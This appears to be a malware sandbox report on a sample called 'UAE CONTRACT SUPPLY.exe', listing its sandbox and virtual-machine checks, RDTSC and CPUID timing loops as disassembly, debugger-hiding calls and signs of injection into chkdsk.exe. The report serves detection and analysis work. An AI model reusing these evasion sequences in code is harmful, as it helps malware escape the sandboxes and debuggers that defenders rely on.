      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB3F2 push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB3A5 push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFBB58 push ebp; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CEC308 push ds; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFBCB2 push cs; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB45C push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB5BB push ebp; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF4EAE push eax; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFBEAB push ecx; iretd
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226054E EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022652C8 NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005652C8
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002260457 second address: 0000000002260457 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 00000000022652A9 second address: 00000000022652A9 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F29049E4728h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, dx 0x00000020 test ah, ah 0x00000022 add edi, edx 0x00000024 cmp dl, bl 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007F29049E46FEh 0x00000035 cmp dx, 3BF6h 0x0000003a cmp dl, dl 0x0000003c call 00007F29049E477Ah 0x00000041 call 00007F29049E4738h 0x00000046 lfence 0x00000049 mov edx, dword ptr [7FFE0014h] 0x0000004f lfence 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 pushad 0x00000056 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002265176 second address: 0000000002265176 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002265B0F second address: 0000000002265B0F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], FFFFFFE8h 0x0000000d jne 00007F29049E3212h 0x0000000f test bh, FFFFFFD2h 0x00000012 cmp bl, bl 0x00000014 cmp byte ptr [ebx], FFFFFFB8h 0x00000017 jne 00007F29049E31E8h 0x00000019 cmp ecx, 00002000h 0x0000001f jne 00007F29049E30D5h 0x00000025 inc ecx 0x00000026 inc ebx 0x00000027 test ch, ch 0x00000029 cmp dword ptr [ebx], 9090C350h 0x0000002f jne 00007F29049E31D6h 0x00000031 jmp 00007F29049E31E2h 0x00000033 test cx, dx 0x00000036 cmp edx, dword ptr [ebx] 0x00000038 jne 00007F29049E31CEh 0x0000003a pushad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000000564E71 second address: 0000000000564E71 instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, UAE CONTRACT SUPPLY.exe, 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE9
      Source: UAE CONTRACT SUPPLY.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002262D1F second address: 0000000002262D1F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, ebx 0x0000000d mov ecx, 00001000h 0x00000012 cmp ebx, eax 0x00000014 div ecx 0x00000016 cmp edx, 00000000h 0x00000019 jne 00007F29049E46E2h 0x0000001b dec ebx 0x0000001c xor edx, edx 0x0000001e jmp 00007F29049E473Eh 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002260457 second address: 0000000002260457 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 00000000022652A9 second address: 00000000022652A9 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F29049E4728h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, dx 0x00000020 test ah, ah 0x00000022 add edi, edx 0x00000024 cmp dl, bl 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007F29049E46FEh 0x00000035 cmp dx, 3BF6h 0x0000003a cmp dl, dl 0x0000003c call 00007F29049E477Ah 0x00000041 call 00007F29049E4738h 0x00000046 lfence 0x00000049 mov edx, dword ptr [7FFE0014h] 0x0000004f lfence 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 pushad 0x00000056 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 00000000022652F2 second address: 00000000022652F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F29049E3695h 0x0000001d popad 0x0000001e call 00007F29049E32E0h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002265176 second address: 0000000002265176 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002265B0F second address: 0000000002265B0F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], FFFFFFE8h 0x0000000d jne 00007F29049E3212h 0x0000000f test bh, FFFFFFD2h 0x00000012 cmp bl, bl 0x00000014 cmp byte ptr [ebx], FFFFFFB8h 0x00000017 jne 00007F29049E31E8h 0x00000019 cmp ecx, 00002000h 0x0000001f jne 00007F29049E30D5h 0x00000025 inc ecx 0x00000026 inc ebx 0x00000027 test ch, ch 0x00000029 cmp dword ptr [ebx], 9090C350h 0x0000002f jne 00007F29049E31D6h 0x00000031 jmp 00007F29049E31E2h 0x00000033 test cx, dx 0x00000036 cmp edx, dword ptr [ebx] 0x00000038 jne 00007F29049E31CEh 0x0000003a pushad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000000562D1F second address: 0000000000562D1F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, ebx 0x0000000d mov ecx, 00001000h 0x00000012 cmp ebx, eax 0x00000014 div ecx 0x00000016 cmp edx, 00000000h 0x00000019 jne 00007F29049E46E2h 0x0000001b dec ebx 0x0000001c xor edx, edx 0x0000001e jmp 00007F29049E473Eh 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 00000000005652F2 second address: 00000000005652F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F29049E3695h 0x0000001d popad 0x0000001e call 00007F29049E32E0h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000000564E71 second address: 0000000000564E71 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000CE85E4 second address: 0000000000CE85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000CE896E second address: 0000000000CE8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022608D0 rdtsc
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 0000000D.00000000.499784826.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 0000000D.00000000.499829502.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, UAE CONTRACT SUPPLY.exe, 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe9
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 0000000D.00000002.649228259.000000000641C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000D.00000000.499784826.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 0000000D.00000002.649228259.000000000641C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000D.00000002.648636841.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
      Source: explorer.exe, 0000000D.00000000.499476016.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: UAE CONTRACT SUPPLY.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 0000000D.00000000.499476016.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 0000000D.00000000.499829502.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: explorer.exe, 0000000D.00000002.631792237.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226054E NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022608D0 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02263A1C LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02264B16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02264FBF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226206F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262078 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022658C3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262CDC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022658DB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022619AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E508EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5446A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E590EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E590EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E590EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5037F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5814FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E503D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E543540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EC577 mov eax, dword ptr fs:[00000030h]
